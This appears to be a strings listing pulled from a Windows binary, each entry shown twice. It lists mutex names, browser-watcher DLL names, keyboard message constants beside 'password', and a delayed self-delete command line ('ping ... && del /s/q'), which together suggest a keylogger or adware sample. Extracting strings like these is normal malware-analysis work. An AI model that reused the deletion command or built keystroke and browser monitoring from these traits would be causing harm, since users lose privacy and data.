Global\{5F26509F-29FE-4598-8800-FA22CE9CC17F}__Mutex
Global\{5F26509F-29FE-4598-8800-FA22CE9CC17F}__Mutex
IeWatchDog.dll
IeWatchDog.dll
BrowerWatchFF.dll
BrowerWatchFF.dll
BrowerWatchCH.dll
BrowerWatchCH.dll
Global\GUID(6D05BFEC-4307-4649-8963-962A24345DF4)
Global\GUID(6D05BFEC-4307-4649-8963-962A24345DF4)
Amsimg32.dll
Amsimg32.dll
User32.dll
User32.dll
WM_KEYDOWN
WM_KEYDOWN
WM_KEYUP
WM_KEYUP
WM_SYSKEYDOWN
WM_SYSKEYDOWN
WM_SYSKEYUP
WM_SYSKEYUP
0xX
0xX
keyboard
keyboard
Bmsftedit.dll
Bmsftedit.dll
password
password
%s%s%s
%s%s%s
Correct password required
Correct password required
%s\%s
%s\%s
WebBrowser
WebBrowser
transshadow
transshadow
transshadow1
transshadow1
dest='%d,%d,%d,%d'
dest='%d,%d,%d,%d'
dest='%d,%d,%d,%d' source='%d,%d,%d,%d'
dest='%d,%d,%d,%d' source='%d,%d,%d,%d'
source='%d,%d,%d,%d' dest='%d,%d,%d,%d'
source='%d,%d,%d,%d' dest='%d,%d,%d,%d'
M-d-d
M-d-d
WebBrowserUI
WebBrowserUI
errorUrl
errorUrl
E{D27CDB6E-AE6D-11CF-96B8-444553540000}
E{D27CDB6E-AE6D-11CF-96B8-444553540000}
user32.dll
user32.dll
MSPDB110.DLL
MSPDB110.DLL
ADVAPI32.DLL
ADVAPI32.DLL
/c ping 127.0.0.1 -n 2 > nul && del /s/q
/c ping 127.0.0.1 -n 2 > nul && del /s/q
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
SupHPNot.exe
SupHPNot.exe
4,0,1,1716
4,0,1,1716
SupHPNty.exe
SupHPNty.exe